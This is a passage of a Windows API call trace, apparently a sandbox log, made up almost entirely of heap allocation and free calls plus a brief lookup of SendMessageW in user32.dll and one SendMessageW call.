RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf698 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96898 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd968b0 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd968c8 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd968e0 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd968f8 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96910 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96928 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96940 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96958 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff360 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf6c0 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96970 [0268.417] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff370 [0268.417] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff370 | out: hHeap=0xb80000) returned 1 [0268.417] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96970 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf6c0 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff360 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968b0 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96898 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968c8 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968e0 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd968f8 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96928 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96910 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96940 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96958 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf698 | out: hHeap=0xb80000) returned 1 [0268.418] PeekMessageW (in: lpMsg=0x75f6b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f6b4) returned 0 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff360 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf698 [0268.418] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf698 | out: hHeap=0xb80000) returned 1 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff360 | out: hHeap=0xb80000) returned 1 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf698 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdff360 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf6c0 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96958 [0268.418] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff370 [0268.418] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff370 | out: hHeap=0xb80000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdff370 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96940 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff380 [0268.419] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff380 | out: hHeap=0xb80000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdff380 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96910 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff390 [0268.419] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff390 | out: hHeap=0xb80000) returned 1 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd96928 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf6e8 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd968f8 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff390 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd968e0 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf710 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd968c8 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff3a0 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96898 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf738 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd968b0 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff3b0 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96970 [0268.419] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff3c0 [0268.420] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3c0 | out: hHeap=0xb80000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf760 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96988 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff3c0 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd969a0 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff3d0 [0268.420] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3d0 | out: hHeap=0xb80000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf788 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd969b8 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff3d0 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd969d0 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff3e0 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd969e8 [0268.420] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3e0 | out: hHeap=0xb80000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf7b0 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a00 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff3e0 [0268.420] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a00 | out: hHeap=0xb80000) returned 1 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf7d8 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a00 [0268.420] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a18 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff3f0 [0268.421] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969e8 | out: hHeap=0xb80000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd969e8 [0268.421] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff3f0 | out: hHeap=0xb80000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf800 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a30 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff3f0 [0268.421] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a30 | out: hHeap=0xb80000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf828 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a30 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a48 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff400 [0268.421] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd969e8 | out: hHeap=0xb80000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd969e8 [0268.421] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff400 | out: hHeap=0xb80000) returned 1 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf850 [0268.421] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a60 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff400 [0268.422] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96a60 | out: hHeap=0xb80000) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf878 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a60 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a78 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda3e40 [0268.422] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf8a0 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96a90 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff410 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96aa8 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ac0 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff420 [0268.422] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ac0 | out: hHeap=0xb80000) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf8c8 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ac0 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ad8 [0268.422] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.422] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96af0 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b08 [0268.423] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b20 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b38 [0268.423] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b50 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b68 [0268.423] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b80 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.423] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96b98 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96bb0 [0268.423] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96bc8 [0268.423] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.423] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96be0 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96bf8 [0268.424] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda3e88 [0268.424] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf8c8 | out: hHeap=0xb80000) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c10 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.424] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c28 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c40 [0268.424] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c58 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdff430 [0268.424] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff430 | out: hHeap=0xb80000) returned 1 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff430 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c70 [0268.424] CharLowerBuffW (in: lpsz="lresult", cchLength=0x7 | out: lpsz="lresult") returned 0x7 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff440 [0268.424] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff450 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff440 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff450 | out: hHeap=0xb80000) returned 1 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf8c8 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff450 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff440 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff460 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff440 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff460 | out: hHeap=0xb80000) returned 1 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff460 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff440 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff470 [0268.425] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff440 | out: hHeap=0xb80000) returned 1 [0268.425] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff470 | out: hHeap=0xb80000) returned 1 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff470 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff440 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff480 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff440 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff480 | out: hHeap=0xb80000) returned 1 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff480 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff440 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff490 [0268.426] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff440 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.426] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff490 | out: hHeap=0xb80000) returned 1 [0268.426] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76e00000 [0268.427] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.427] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff490 [0268.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0268.427] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xd) returned 0xd96c88 [0268.427] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0xd96c88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMessageW", lpUsedDefaultChar=0x0) returned 13 [0268.427] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.427] GetProcAddress (hModule=0x76e00000, lpProcName="SendMessageW") returned 0x76e19679 [0268.427] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ca0 | out: hHeap=0xb80000) returned 1 [0268.427] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff490 | out: hHeap=0xb80000) returned 1 [0268.427] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf8f0 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff490 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff440 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4a0 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4b0 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff490 | out: hHeap=0xb80000) returned 1 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff440 | out: hHeap=0xb80000) returned 1 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4a0 | out: hHeap=0xb80000) returned 1 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4b0 | out: hHeap=0xb80000) returned 1 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf8f0 | out: hHeap=0xb80000) returned 1 [0268.428] SendMessageW (hWnd=0x60168, Msg=0xc5, wParam=0x3b9ac9ff, lParam=0x0) returned 0x1 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4b0 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbc73f0 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x14) returned 0xca78f8 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ca0 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96cb8 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4a0 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96cb8 | out: hHeap=0xb80000) returned 1 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4a0 | out: hHeap=0xb80000) returned 1 [0268.428] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96c88 | out: hHeap=0xb80000) returned 1 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96c88 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96cb8 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96cd0 [0268.428] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4a0 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96cd0 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4a0 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96cb8 | out: hHeap=0xb80000) returned 1 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96cb8 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96cd0 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ce8 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdff4a0 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96ce8 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdff4a0 | out: hHeap=0xb80000) returned 1 [0268.429] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd96cd0 | out: hHeap=0xb80000) returned 1 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96cd0 [0268.429] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd96ce8 [0268.429] RtlAllocateHeap 